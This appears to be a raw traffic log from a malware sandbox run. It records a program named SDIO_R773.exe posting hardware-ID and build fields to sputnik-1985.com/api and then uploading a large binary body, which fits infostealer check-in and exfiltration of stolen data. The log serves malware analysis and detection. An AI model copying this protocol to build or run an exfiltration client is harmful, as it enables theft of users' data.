                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.449744104.21.64.14437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:28 UTC370OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=IL6BMMWY71KX89XER
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 20428
                                                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                                                            2025-01-11 10:56:28 UTC15331OUTData Raw: 2d 2d 49 4c 36 42 4d 4d 57 59 37 31 4b 58 38 39 58 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 37 34 38 30 44 41 36 45 43 46 46 44 34 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 49 4c 36 42 4d 4d 57 59 37 31 4b 58 38 39 58 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 4c 36 42 4d 4d 57 59 37 31 4b 58 38 39 58 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 32 0d 0a 2d 2d 49 4c
                                                                                                                                                                                                                                            Data Ascii: --IL6BMMWY71KX89XERContent-Disposition: form-data; name="hwid"4D57480DA6ECFFD4E2FCF1EEA745798E--IL6BMMWY71KX89XERContent-Disposition: form-data; name="pid"3--IL6BMMWY71KX89XERContent-Disposition: form-data; name="lid"BbL7Kk--02--IL
                                                                                                                                                                                                                                            2025-01-11 10:56:28 UTC5097OUTData Raw: 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                            2025-01-11 10:56:29 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=nq5vui61vqfip1rmkdjr13rlhp; expires=Wed, 07 May 2025 04:43:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzvtWa%2Fu0YeG9vfXGgfUrmos4%2FbN9kwwpadTBBwXl03HK9ZJr%2FQYj0rcUG6VJ8UnWzjV9iv5Jge7zPJLUJ3ljO2fAXkE9o8Zp0H7Efr%2B9fRXAvW2fT%2Bc%2B8O2uE6uUjoHKQM6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 90046163e9dd8ca1-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1931&rtt_var=735&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21478&delivery_rate=1476985&cwnd=168&unsent_bytes=0&cid=2cfb432faa2e71ae&ts=628&x=0"
                                                                                                                                                                                                                                            2025-01-11 10:56:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2025-01-11 10:56:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.449745104.21.64.14437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:30 UTC365OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=5NLKGQ3BJ2AK5
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1234
                                                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                                                            2025-01-11 10:56:30 UTC1234OUTData Raw: 2d 2d 35 4e 4c 4b 47 51 33 42 4a 32 41 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 37 34 38 30 44 41 36 45 43 46 46 44 34 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 35 4e 4c 4b 47 51 33 42 4a 32 41 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4e 4c 4b 47 51 33 42 4a 32 41 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 32 0d 0a 2d 2d 35 4e 4c 4b 47 51 33 42 4a 32 41 4b 35 0d
                                                                                                                                                                                                                                            Data Ascii: --5NLKGQ3BJ2AK5Content-Disposition: form-data; name="hwid"4D57480DA6ECFFD4E2FCF1EEA745798E--5NLKGQ3BJ2AK5Content-Disposition: form-data; name="pid"1--5NLKGQ3BJ2AK5Content-Disposition: form-data; name="lid"BbL7Kk--02--5NLKGQ3BJ2AK5
                                                                                                                                                                                                                                            2025-01-11 10:56:30 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=o0erj456ab29ku5lqrmhn9gbge; expires=Wed, 07 May 2025 04:43:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfaI%2FmaSEmESV7Tdw3WqRouOYj%2BbzNY%2BZjAs5KNRUZL6bkSQu5TGlyzd20f4qLhgYh3ll%2BDSLpBlet5jcKGCigK9nbmKIvwowJmHdzMOOIwOSrcpafpiRKbvanh6fjV0Y0IC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 9004616ddd73de95-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1605&rtt_var=606&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2235&delivery_rate=1799137&cwnd=243&unsent_bytes=0&cid=c387b8a553c36f58&ts=435&x=0"
                                                                                                                                                                                                                                            2025-01-11 10:56:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2025-01-11 10:56:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.449746104.21.64.14437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC367OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=53G1TXEPG3U24
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 589917
                                                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: 2d 2d 35 33 47 31 54 58 45 50 47 33 55 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 37 34 38 30 44 41 36 45 43 46 46 44 34 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 35 33 47 31 54 58 45 50 47 33 55 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 33 47 31 54 58 45 50 47 33 55 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 32 0d 0a 2d 2d 35 33 47 31 54 58 45 50 47 33 55 32 34 0d
                                                                                                                                                                                                                                            Data Ascii: --53G1TXEPG3U24Content-Disposition: form-data; name="hwid"4D57480DA6ECFFD4E2FCF1EEA745798E--53G1TXEPG3U24Content-Disposition: form-data; name="pid"1--53G1TXEPG3U24Content-Disposition: form-data; name="lid"BbL7Kk--02--53G1TXEPG3U24
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: 5b 35 eb dd d5 39 6c 8b 8c 8a aa e4 6d 93 59 6e 4e 13 dd 7a 45 4d 2a 71 d0 de 27 74 31 4b 15 1b 51 11 7f 9c 09 bc 0f 42 65 97 6a 66 4a af f1 e3 06 06 b7 f2 0a 89 8f 61 2f 75 c2 40 89 52 25 82 fe 3c bd d1 50 1b 33 74 e4 ec a4 76 f8 5f 1f f7 89 da 60 6e b7 f4 13 9c f9 9f 17 1e 9c 5a 33 9f 91 e9 aa 7a 90 ad 8e 66 4f ab 9b b2 df bf 4f 85 e8 3b 4c 85 6c e8 ab e6 1d 6c aa 9e a8 06 25 49 7b 42 0a ef ce b4 74 71 9e c9 af c0 0d f2 f7 40 5b 50 75 74 6f c2 69 ce 8e d9 42 93 30 f7 43 29 7b 71 d3 8c 21 17 37 1f e5 ae 55 de 10 de 86 f3 f9 eb eb 35 07 a9 e7 d9 e9 f3 3e 31 c2 00 e8 45 50 ad 51 29 34 cb 22 31 fa 4f f1 ee d5 93 7e cb 5f c2 73 40 8f b0 ef 6d dd 27 a0 a7 1a b0 83 77 af 27 1f fc e4 ba 9a 52 16 d8 e9 a6 c2 77 9f 8d 3a cd 36 9b db 5c e7 9d a4 c8 92 a9 b0 17 93
                                                                                                                                                                                                                                            Data Ascii: [59lmYnNzEM*q't1KQBejfJa/u@R%<P3tv_`nZ3zfOO;Lll%I{Btq@[PutoiB0C){q!7U5>1EPQ)4"1O~_s@m'w'Rw:6\
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: 1e 92 f0 63 18 bb a0 5e d3 92 dc 1b af 28 36 0a ec 49 4d 2f 1b a1 e0 f9 d1 38 0e 50 fc 54 0c f6 e7 cd 94 76 df 78 72 98 a0 12 90 de c5 94 9b cd d6 b1 74 ae b3 36 42 89 7a 59 3c 8f e6 60 10 ec a6 ac 0d e5 bd 50 88 a6 0f 6d 81 45 8f 43 66 17 1b 24 05 75 dd ce bf 57 ba e0 b7 2f 52 48 ed 75 2a 8d f0 9d 96 99 01 27 f0 f9 42 d0 c9 8b aa bf ef b0 95 04 91 4c c2 20 ba c9 ee 72 1e e7 8a 18 36 b3 15 e6 17 7b bd 9e 04 f0 4d 5a df d9 ec fe 2a a0 5c 53 89 d5 5c f3 ea 7a 1a 6a e7 b2 31 f0 18 56 e6 74 9b 41 b7 4e 23 e6 f7 f2 38 8d b6 42 d4 7d 98 93 92 e7 49 1d 8c 48 2f de 18 c2 f3 88 6f 3c a2 ae 10 ef 43 87 4a 71 f6 79 06 70 fc de fc 43 a0 fc 5f 64 60 6c ce 17 47 ed 7d d1 f5 c3 db a5 37 a5 a3 c2 7d a7 ae 01 33 11 99 e5 c6 82 9c 8b b9 2e f6 30 27 6b 23 ac 83 a3 fd 81 63
                                                                                                                                                                                                                                            Data Ascii: c^(6IM/8PTvxrt6BzY<`PmECf$uW/RHu*'BL r6{MZ*\S\zj1VtAN#8B}IH/o<CJqypC_d`lG}7}3.0'k#c
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: a2 83 ee 61 18 ab 23 cd f7 37 4c 12 8d c1 4a ca 45 d6 1f 3d 83 fe 63 a9 43 33 cf c3 57 a0 1c 64 f0 45 07 62 57 e2 76 f5 91 bb af 9a 6f 59 1b 3f 62 d8 74 04 79 00 41 c8 b9 e7 9c 5d 81 e2 ef ce aa a5 c1 5a 95 02 ce e9 01 21 b2 2f e7 28 7b 0c 05 c2 b3 5b 6a 25 32 2e ff 17 bf 3f ee dc f0 91 be f0 e5 93 f7 05 8b ce 81 2d 36 f3 82 e7 6b ee 0e 04 50 02 bc b6 2a f7 60 ab bb 2f d8 9f 8f aa 16 d5 2e 15 00 87 12 88 6c c8 75 5e da c4 6d a1 54 7e 9b 48 a9 2c c8 63 11 fd ea ee 44 c5 0b a7 54 f8 de de 04 9e f3 65 26 44 53 40 da 32 8c ec e7 86 37 53 e8 1b 91 77 38 27 21 de 04 78 e4 52 06 40 7e 27 88 df cd 7c b9 3c 7a 9e 20 fa 9c 61 a0 a7 2e 79 1f 52 5b 47 00 cd 00 0f 28 c4 c5 b2 da 06 58 4d 5e f0 29 88 90 fb b4 a8 84 27 3d a5 f0 74 1d fd a7 fa 17 e6 ce 4a 41 00 f5 f8 d7
                                                                                                                                                                                                                                            Data Ascii: a#7LJE=cC3WdEbWvoY?btyA]Z!/({[j%2.?-6kP*`/.lu^mT~H,cDTe&DS@27Sw8'!xR@~'|<z a.yR[G(XM^)'=tJA
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: ae fa c3 68 28 ce 49 e4 b5 37 4f 28 bc d6 b4 c6 a3 d4 94 a2 22 d9 03 c2 f5 7c b9 22 38 45 3f a5 83 dc dc e8 10 47 e8 95 ec 3a 69 e5 f3 d2 1a 0d 2b 96 d4 9c 6b 2a f2 db 4d 62 0c 1a ea aa ba 95 50 df 19 79 4f cc 62 af 88 cb 04 1f aa b5 92 04 27 6e 34 5e da f1 16 98 73 dc 1b cd 76 84 be f6 c3 e7 fb eb 67 36 47 7e f4 e9 49 b1 e5 35 1a 69 33 2d fb b5 47 23 62 63 d2 18 3c a1 50 bc bc eb 97 fb 95 ab 65 2a 80 e6 aa 32 38 bd 04 99 55 87 db e5 a8 a8 e2 e7 43 db 57 d6 fc 46 db 36 2c 2b 5a d6 5e 6f ba c5 45 d6 ad ab 1d e4 49 54 51 19 68 dc 88 f7 38 24 92 66 c8 45 6d 03 f6 a6 79 9a a1 3f 47 47 b9 6d 40 0b 82 ff be a7 e2 30 c9 b4 82 13 f2 23 5a b4 f9 ee e0 aa 77 3a c9 21 af 96 2b c3 69 9d e2 49 3c 0c 88 17 88 2d 0e a2 08 6d a1 39 6b 10 5f a1 01 de b9 0a 8d 16 58 47 c1
                                                                                                                                                                                                                                            Data Ascii: h(I7O("|"8E?G:i+k*MbPyOb'n4^svg6G~I5i3-G#bc<Pe*28UCWF6,+Z^oEITQh8$fEmy?GGm@0#Zw:!+iI<-m9k_XG
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: 78 b2 6d 15 1e 44 1c 66 5a 74 ab bc 4e cb 91 d8 14 93 9e 0e 29 d9 c2 6e ed 4d 19 b1 d8 9b 79 03 5f d6 60 22 33 01 cd 0f df 63 04 2e ba ca 87 ea 3b b7 d6 18 7b 62 44 ce 54 21 70 5e 2a 39 66 51 bc 35 e4 71 ea d8 6c 72 b5 c3 01 af 89 3e b5 c2 f4 02 d1 19 32 d2 7c 92 ef 7b 91 af 60 5f 8c 97 ba 4e f6 2e 65 75 8c 2a e0 85 44 45 99 6b f3 a9 85 d8 7e ff 4c 17 9b 49 81 c3 3a cd de be 5b fb 84 92 13 f6 e6 e9 70 f9 f4 12 21 23 4f 50 7c 68 64 07 c8 5c 38 c7 6c 60 1c ba ec 11 6b 8a 65 4d 7d 2c f8 54 d9 05 b9 a5 84 09 20 47 d8 11 bf e2 9f 10 69 04 ec 62 2e cf d4 c0 34 50 a3 12 36 39 3d 93 d3 8c 03 fb d5 da ed e1 c7 60 46 b1 fa 3f 46 49 6b f0 64 eb 15 9e c0 bd 80 05 55 f9 5e 24 d2 fc c8 a9 ca 99 ea e1 03 af 74 77 7d 75 ee 9d 6e 4d 2b b9 f3 1f 1d a2 bb 52 4c c2 c1 62 b4
                                                                                                                                                                                                                                            Data Ascii: xmDfZtN)nMy_`"3c.;{bDT!p^*9fQ5qlr>2|{`_N.eu*DEk~LI:[p!#OP|hd\8l`keM},T Gib.4P69=`F?FIkdU^$tw}unM+RLb
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: c5 f0 59 ff dd 2a e3 d2 b9 ae fe bf af dc 2d fd 56 fb cf ab 3b 65 fb 4a 97 26 75 77 13 b8 bd ad 7f 57 71 ff 0c ef 21 6c 2c a5 b5 62 17 5f 29 83 9e 34 81 41 0a 0c 8b 08 98 54 6d 5e 17 05 69 0c b0 58 37 fe fb 10 c8 46 c1 4c ed 4c 2d 9c 05 20 64 43 28 04 42 1c ac 8b 43 39 af 07 d4 7e 9d 46 f2 42 29 38 b9 65 f6 c1 1e 03 04 2f 5c 14 3f bc 9f 90 b5 79 b1 3f fd a3 c6 f7 9d 22 a6 e8 70 18 7e d6 74 79 b9 bb bb f2 cf c2 55 d1 d4 30 b6 61 8e d9 87 18 96 b7 f7 86 fb 8b 47 10 29 c3 8b 7e 08 cc 5a 7b 0b 03 11 41 6c 8b e4 76 73 44 de f2 7a c9 a3 e6 db 97 45 35 f1 bc 14 db 7f 74 e9 e1 05 4f 7c db 3f f0 aa 3c d4 25 07 cb 43 77 4a 41 10 06 3e 84 c1 bf db 85 17 40 fc 99 4a cf 16 b4 19 ab f2 e3 a3 1f 7f 3b 9e 2e 00 2e fd 60 c7 fe 00 85 2d c4 9a ca a4 20 9c 8d f5 24 e7 d6 4c
                                                                                                                                                                                                                                            Data Ascii: Y*-V;eJ&uwWq!l,b_)4ATm^iX7FLL- dC(BC9~FB)8e/\?y?"p~tyU0aG)~Z{AlvsDzE5tO|?<%CwJA>@J;..`- $L
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: 38 5a e5 cf 4e 06 71 43 8c 30 23 56 41 fc e6 24 3f 18 e1 5b 25 dd 99 38 ba d1 97 91 f3 9f 6b f9 5d 46 70 31 eb e6 5d 83 b9 88 79 a5 3b dc 1c c1 c1 82 2f bb d3 7e 98 dc b7 db f0 5e 2c 6d 4b 53 4a 69 0d ad a9 70 b9 74 69 73 93 cd e2 dc 8f 37 e3 e8 33 8e ce 2d 5b 04 4e 48 c1 bd 16 12 dd 80 1a 23 f1 bf e0 31 1b 5c ce 7c 4c 60 59 8e 1c 89 e4 cc 96 4f b8 ba 0c ce 94 2f 77 af 70 90 8a 8a 21 65 6c 16 4a 0b 4b 9b 4c 79 ea 5f b2 a0 84 5b d3 14 88 c1 58 f2 91 f8 2c 4b 9b 08 92 84 ac 5f 84 73 03 48 bd 8a ad 1d 16 15 ee bf 17 14 5a 2b 29 47 08 89 45 df 18 71 04 19 cd 0d ce 39 60 33 34 02 ed ba 56 0b f3 be 64 5c c2 e2 e3 df 3f 16 84 87 05 a1 3f 69 74 f7 e0 cf 42 8c 55 ff 99 ad 09 ff 53 55 7c c1 67 7a 02 9a 6e 7d 4b 1b f9 ef cb c4 86 66 eb 81 21 ee c8 b1 57 60 71 6c 84
                                                                                                                                                                                                                                            Data Ascii: 8ZNqC0#VA$?[%8k]Fp1]y;/~^,mKSJiptis73-[NH#1\|L`YO/wp!elJKLy_[X,K_sHZ+)GEq9`34Vd\??itBUSU|gzn}Kf!W`ql
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: d4 8f 89 3a a3 ab 17 dd 12 83 30 5d 41 5f 6b 98 60 65 f7 8c 4d bd 7d db ba e3 a9 5f 7f ea 6a ff de 16 64 97 bf c0 23 8a 8e bc 99 10 f2 6e 04 e5 75 69 74 d2 f2 8d 30 38 09 ed d5 9a 36 fa ac 3a 45 28 60 e1 5b 06 65 66 61 17 a6 c6 89 7c 13 b5 0b f5 6d 95 26 47 58 f6 a7 5e 03 5e 3f 12 f6 47 f0 73 0c d0 cd 85 96 51 0c 4e 59 1e da 85 2f 3f 41 cd 63 63 20 9f 4a 64 93 a2 ab ee a2 ed e8 d9 46 00 87 95 da 46 8a ed 4e d9 c5 53 6d 15 1c 2d c1 1a 60 a1 5f eb 2f 5e b9 ec a7 1d 5d 77 7b 88 0c cb 37 40 18 3c 5e 48 f1 f2 5b 15 e5 7b 0d f6 ba 33 bb d6 5e a8 0a 3d 36 d6 b9 1f 95 7e 81 75 04 a9 3a ab 81 4f 5d b7 cd db 78 e6 87 b7 e9 e6 c7 a9 9e cf 63 29 1e 7e ef 0a 68 19 38 83 c5 f1 91 8d 13 fc d6 1f c3 68 5d 12 26 df bf 89 b5 b2 3b a3 09 65 7c 3e eb fa 7a 3c c2 a4 29 9a f9
                                                                                                                                                                                                                                            Data Ascii: :0]A_k`eM}_jd#nuit086:E(`[efa|m&GX^^?GsQNY/?Acc JdFFNSm-`_/^]w{7@<^H[{3^=6~u:O]xc)~h8h]&;e|>z<)
                                                                                                                                                                                                                                            2025-01-11 10:56:31 UTC15331OUTData Raw: 72 1e d7 3b 9d a2 0e 55 7d 23 97 40 96 95 32 98 d9 3a 63 68 a3 7a 8a 8c 4c 73 68 a3 a2 46 79 ae 99 30 a7 d5 4d 3b ff ec b7 be 24 54 9b 44 71 9a 8c a0 94 61 5e 89 38 e4 5d 26 d7 86 c9 42 5b 64 3e 55 0a 01 11 bb a2 40 c2 51 16 67 dd 7f 8c c8 ee 8b 69 0f 2d c5 35 d7 05 e4 bf 62 a0 73 76 29 96 ff 3b 4e ca fe a8 b4 f6 4d 8e f6 6d f9 f4 00 5b 44 39 82 41 9e ff 75 11 57 98 6c c5 ac f1 ee 47 a9 ee e9 0f 29 92 ee d3 9d 5a 66 39 d4 65 45 da d7 be 53 29 27 b0 7e 64 a6 94 16 9d 27 36 7d 2b ef 56 0e 2b f4 d3 96 ec 7f 27 cc 9c 98 df 0e 48 4e b1 a1 b8 af 16 a7 c2 07 fe f5 32 d8 b3 fc a1 6e f6 c5 6c e4 7b e9 46 af f0 97 8b d5 7a 33 ee ca b3 96 ff a0 cf fe 83 76 8d 90 9a ad 16 ed 58 fb c6 ea 9b 29 4d fb d8 17 f0 44 ba 30 6f 3a e6 d8 ad 93 2e 41 7b dd ce 2b 5a 09 74 80 9b
                                                                                                                                                                                                                                            Data Ascii: r;U}#@2:chzLshFy0M;$TDqa^8]&B[d>U@Qgi-5bsv);NMm[D9AuWlG)Zf9eES)'~d'6}+V+'HN2nl{Fz3vX)MD0o:.A{+Zt
                                                                                                                                                                                                                                            2025-01-11 10:56:33 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=jddtql0bnpa8k33qt9av3nd252; expires=Wed, 07 May 2025 04:43:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qza4Xr7mo%2F7C10nsE1FZ1KJhcmgbtC1fzLoy641mSbvKf%2FtDUQiAdFqTlXZS1whR4ospJGhqJqYnB4cfmdJoT6KMuy7vSG8LexZRpjJ6IVNp3Rtoy4vxBhc9u3It%2Fh%2FMb8%2BU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 900461764826c358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
